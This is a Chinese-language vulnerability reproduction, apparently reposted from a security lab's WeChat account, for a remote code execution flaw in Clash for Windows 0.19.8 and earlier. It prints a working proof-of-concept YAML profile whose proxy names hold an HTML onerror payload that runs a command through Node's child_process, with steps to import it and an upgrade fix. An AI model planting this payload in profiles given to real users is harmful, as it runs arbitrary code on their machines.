一、Clash介绍
A rule-based tunnel in Go
二、漏洞POC
原漏洞发现作者及POC链接:
https://github.com/Fndroid/clash_for_windows_pkg/issues/2710
影响的版本:
0.19.8及以下版本均会受到影响,0.19.9版本会受到部分影响
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
proxy-groups:
-
name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
三、漏洞复现
1. 下载Clash for windows v0.19.8版本:
https://github.com/Fndroid/clash_for_windows_pkg/releases
2、安装后打开clash,将poc直接复制到Profiles中的“Download from a URL”框中,或将POC保存文件为yaml格式,然后点击import导入文件后右键点击proxies即可:
3、均弹出计算器,漏洞利用成功
四、修复建议
建议升级到最新版本0.19.10修复此漏洞
免责声明
由于传播、利用本公众号NGC660安全实验室所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号GC600安全实验室及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
原文始发于微信公众号(NGC660安全实验室):Clash_for_Windows RCE漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论